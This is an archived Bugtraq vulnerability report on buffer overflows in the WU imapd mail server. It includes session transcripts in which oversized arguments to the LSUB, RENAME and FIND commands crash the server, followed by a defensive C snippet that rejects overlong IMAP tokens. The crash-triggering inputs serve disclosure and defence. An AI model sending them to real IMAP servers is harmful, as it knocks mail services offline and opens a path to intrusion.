Bugtraq mailing list archives

Re: another WU imapd buffer overflow


From: siva9 () CLICO PL (Michal Szymanski)
Date: Sat, 22 Apr 2000 00:24:33 +0200


Hi again,

imapd seems to be very weak. I've found another three buffer overruns.
This time the affected commands are LSUB, RENAME and FIND:

* OK mail IMAP4rev1 v12.264 server ready
* login siva9 secret
* OK LOGIN completed
* lsub "" AAAAAAAAAAAAA.... (#A 1024 - 8179)

SIGSEGV received.

* OK localhost IMAP4rev1 v12.264 server ready
* login siva9 secret
* OK LOGIN completed
* rename inbox AAAAAAAAAAAAA.... (#A 1021 - 8174)

SIGSEGV received.

* OK localhost IMAP4rev1 v12.264 server ready
* login siva9 secret
* OK LOGIN completed
* find all.mailboxes AAAAAAAAAAAAA.... (#A 1026 - 8168)

SIGSEGV received.

It seems that all two-argument commands in the authenticated state - where the second
argument is a string - are vulnerable.  I'm not sure, but ipop2/3d works fine in
all states, also in the transaction state. Mark, am I right?

Regards,

Michal Szymanski [michal_szymanski () linux com pl];
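
The report above shows LSUB, RENAME and FIND crashing on string arguments of roughly 1021 to 8179 bytes. As an added example (not part of the original post and not UW imapd code), here is a length gate a server or filtering proxy could apply to every command line before any handler copies an argument. The names `arg_len`, `imap_line_ok` and the limit `MAX_ARG` are hypothetical, and IMAP literals (`{n}` syntax) are outside what it parses.

```c
#include <stdio.h>
#include <string.h>

#define MAX_ARG 255   /* assumed policy limit, not a value from the post */

/* Measure one IMAP token at *p (atom or quoted string) and advance *p
 * past it. Returns its length, or -1 for an unterminated quoted string. */
static long arg_len(const char **p)
{
    const char *s = *p;
    long n = 0;
    if (*s == '"') {
        for (s++; *s && *s != '"'; s++, n++)
            if (*s == '\\' && s[1]) s++;   /* escaped char counts once */
        if (*s != '"') return -1;
        s++;
    } else {
        while (*s && *s != ' ' && *s != '\r' && *s != '\n') { s++; n++; }
    }
    *p = s;
    return n;
}

/* Returns 1 if every token on the line (tag, command, each argument) is
 * at most MAX_ARG bytes; 0 if any token is longer or a quote is left open.
 * Checking all tokens covers every multi-argument command, not just three. */
int imap_line_ok(const char *line)
{
    const char *p = line;
    while (*p) {
        while (*p == ' ') p++;
        if (*p == '\0' || *p == '\r' || *p == '\n') break;
        long n = arg_len(&p);
        if (n < 0 || n > MAX_ARG) return 0;
    }
    return 1;
}

int main(void)
{
    char line[2048] = "* lsub \"\" ";      /* constructed sample input */
    size_t off = strlen(line);
    memset(line + off, 'A', 1024);          /* oversized second argument */
    line[off + 1024] = '\0';
    printf("long lsub accepted: %d\n", imap_line_ok(line));
    printf("normal lsub accepted: %d\n", imap_line_ok("* lsub \"\" inbox\r\n"));
    return 0;
}
```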

